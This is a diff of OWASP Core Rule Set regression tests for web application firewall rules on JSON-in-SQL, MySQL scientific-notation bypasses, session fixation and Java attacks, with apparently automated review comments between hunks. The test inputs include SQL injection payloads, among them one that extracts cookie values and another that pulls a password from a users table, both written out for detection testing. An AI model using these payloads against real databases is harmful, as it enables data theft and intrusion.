+ uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-17
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-18
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri:
"/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-19
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-20
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-21
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-22
+ desc: |
+ JSON in SQL
(REQUEST_FILENAME)
+ decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-23
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-24
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri:
"/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-25
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":"b"}' ? 'a'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-26
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":"b"}' ? 'a'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-27
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '[1,2]' ? '1'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-28
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '[1,2]' ?
'1'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-29
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"name":"asd"}' ?| array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-30
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"name":"asd"}' ?| array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-31
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"name":"asd"}' ?& array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-32
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"name":"asd"}' ?& array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-33
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '[1,2,3]'::json ->> 2='3'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-34
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '[1,2,3]'::json ->> 2='3'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-35
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ?
'c'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-36
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
new file mode 100644
index 0000000000..36b2515479
--- /dev/null
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
@@ -0,0 +1,41 @@
+---
+meta:
+ author: "Xhoenix"
+ description: MySQL Scientific Notation bypass payloads Detection
+ enabled: true
+ name: 942560.yaml
+tests:
+ - test_title: 942560-1
+ desc: "Positive test for Scientific Notation in MySQL, e.g 1.e("
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/"
+ data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942560"
+ - test_title: 942560-2
+ desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e("
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "foo=1.e(ascii)"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942560"
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
index 2e706ee6e4..0fda2219c2 100644
--- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
+++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
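Review bot: Test 942560-1 sends its payload as a request body (`data:`) together with `method: GET`, `uri: "/"` and no `Content-Type` header, so whether the engine under test ever parses that body into ARGS depends on the test runner's defaults rather than on the test itself, and the rule may be exercised only by accident. Test 942560-2 in the same hunk uses `method: POST` for the same kind of payload; changing 942560-1 to `method: POST` as well, or moving the payload into `uri:` as a query string, removes that dependency. Both tests assert `log_contains`; a companion negative test with an ordinary float value (constructed example: `data: "foo=1.5e10"` with `no_log_contains: id "942560"`) would pin the false-positive side that the file's description ("bypass payloads Detection") leaves unverified.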
@@ -1,32 +1,49 @@ --- - meta: - author: csanders-git - description: None - enabled: true - name: 943100.yaml - tests: - - - test_title: 943100-1 +meta: + author: csanders-git + description: None + enabled: true + name: 943100.yaml +tests: + - test_title: 943100-1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, - application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, - */* - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) - method: GET - port: 80 - uri: /foo.php?bar=blah - version: HTTP/1.1 - output: - log_contains: id "943100" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /foo.php?bar=blah + version: HTTP/1.1 + output: + log_contains: id "943100" + - test_title: 943100-2 + desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /foo.php?test=.cookie;expires= + version: HTTP/1.1 + output: + log_contains: id "943100" 
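Review bot: The new test 943100-2 carries over the complete legacy header block of 943100-1 (`Keep-Alive`, `Proxy-Connection`, `Accept-Language: zh-sg` and `Referer: http`, which is not a valid URL), although its own `desc` says the case is "Setting Cookie Values in ARG" and the only payload is the query parameter `test=.cookie;expires=`, so none of those headers appears to take part in what is asserted. Trimming the new test to the `Host`/`User-Agent`/`Accept` headers used by the other status-page tests in this commit (for example 942560-2) would make it read as the minimal case it is meant to be and would stop propagating the invalid Referer value into new tests. The `desc` could also name the expected match, e.g. `desc: "Status Page Test - .cookie;expires= in an ARG value triggers 943100"`.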
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
index 03b554f548..b1c2f60329 100644
--- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
+++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
@@ -1,91 +1,85 @@
 ---
- meta:
- author: csanders-git
- description: None
- enabled: true
- name: 943110.yaml
- tests:
- -
- test_title: 943110-1
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943110.yaml
+tests:
+ - test_title: 943110-1
 desc: Session Fixation Attack (943110) from old modsec regressions
 stages:
- -
- stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
- application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
- */*
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-sg
- Content-Type: application/x-www-form-urlencoded
- Host: localhost
- Keep-Alive: '300'
- Proxy-Connection: keep-alive
- Referer: http://www.attackersite.com/test
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
- method: GET
- port: 80
- uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
- version: HTTP/1.1
- output:
- log_contains: id "943110"
- -
- test_title: 943110-2
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Content-Type: application/x-www-form-urlencoded
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http://www.attackersite.com/test
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-2
 desc: "session fixation attack"
 stages:
- -
- stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- Referer: "https://localhost.attackersite.com/"
- method: GET
- port: 80
- uri: "/?phpsessid=asdfdasfadsads"
- version: HTTP/1.0
- output:
- log_contains: id "943110"
- -
- test_title: 943110-3
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host:
localhost
+ Referer: "https://localhost.attackersite.com/"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?phpsessid=asdfdasfadsads"
+ version: HTTP/1.0
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-3
 desc: "session fixation attack"
 stages:
- -
- stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Host: localhost
- Referer: "https://attackersite.com/"
- method: GET
- port: 80
- uri: "/?phpsessid=asdfdasfadsads"
- version: HTTP/1.0
- output:
- log_contains: id "943110"
- -
- test_title: 943110-4
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Referer: "https://attackersite.com/"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?phpsessid=asdfdasfadsads"
+ version: HTTP/1.0
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-4
 desc: Session Fixation Attack (943110) from old modsec regressions
 stages:
- -
- stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-sg
- Content-Type: application/x-www-form-urlencoded
- Host: localhost
- Referer: http://localhost/test
- Keep-Alive: '300'
- Proxy-Connection: keep-alive
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
- method: GET
- port: 80
- uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
- version: HTTP/1.1
- output:
- no_log_contains: id "943110"
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Content-Type: application/x-www-form-urlencoded
+ Host: localhost
+ Referer:
http://localhost/test
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "943110"
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
index a7b0ca84fa..71cf166d82 100644
--- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
+++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
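Review bot: Tests 943110-2 and 943110-3 keep the identical `desc: "session fixation attack"` although they cover two different Referer cases — `https://localhost.attackersite.com/`, a host that merely starts with the `Host` value, and `https://attackersite.com/`, a plainly foreign host — so a failure would not tell the reader which case regressed. Descriptions such as `desc: "Off-domain Referer whose host is prefixed with the Host value (localhost.attackersite.com)"` for 943110-2 and `desc: "Off-domain Referer (attackersite.com)"` for 943110-3 would make the distinction explicit. The only negative case is 943110-4 with a same-host Referer; if 943110 is intended to fire only when a Referer is present (the no-Referer case presumably belonging to 943120 in the next hunk), a further test sending the `jsessionid` parameter with no Referer header at all and `no_log_contains: id "943110"` would pin that boundary.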
@@ -1,31 +1,27 @@
 ---
- meta:
- author: csanders-git
- description: None
- enabled: true
- name: 943120.yaml
- tests:
- -
- test_title: 943120-1
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943120.yaml
+tests:
+ - test_title: 943120-1
 desc: Session Fixation Attack (943120) from old modsec regressions
 stages:
- -
- stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
- application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash,
- */*
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-sg
- Host: localhost
- Keep-Alive: '300'
- Proxy-Connection: keep-alive
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
- method: GET
- port: 80
- uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
- version: HTTP/1.1
- output:
- log_contains: id "943120"
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ log_contains: id "943120"
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
index 52914eec3b..64075646f3 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
@@ -1,29 +1,26 @@
 ---
- meta:
- author: "spartantri"
- enabled: true
- name: "944000.yaml"
- description: "Description"
- tests:
- -
- test_title: 944000-1
- desc: Using text/plain Content-Type which do not have any bodyprocessor associated
- stages:
- -
- stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "ModSecurity CRS 3 Tests"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- Content-Type: "text/plain"
- method: POST
- version: HTTP/1.0
- data: "test=value"
- output:
- no_log_contains: "id \"944000\""
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944000.yaml"
+ description: "Description"
+tests:
+ - test_title: 944000-1
+ desc: Using text/plain Content-Type which do not have any bodyprocessor associated
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ no_log_contains: "id \"944000\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
index 65b7489343..8e0089711d 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
@@ -1,426 +1,355 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944100.yaml" - description: "Description" - tests: - - - test_title: 944100-1 - desc: Argument test includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-2 - desc: Argument test includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 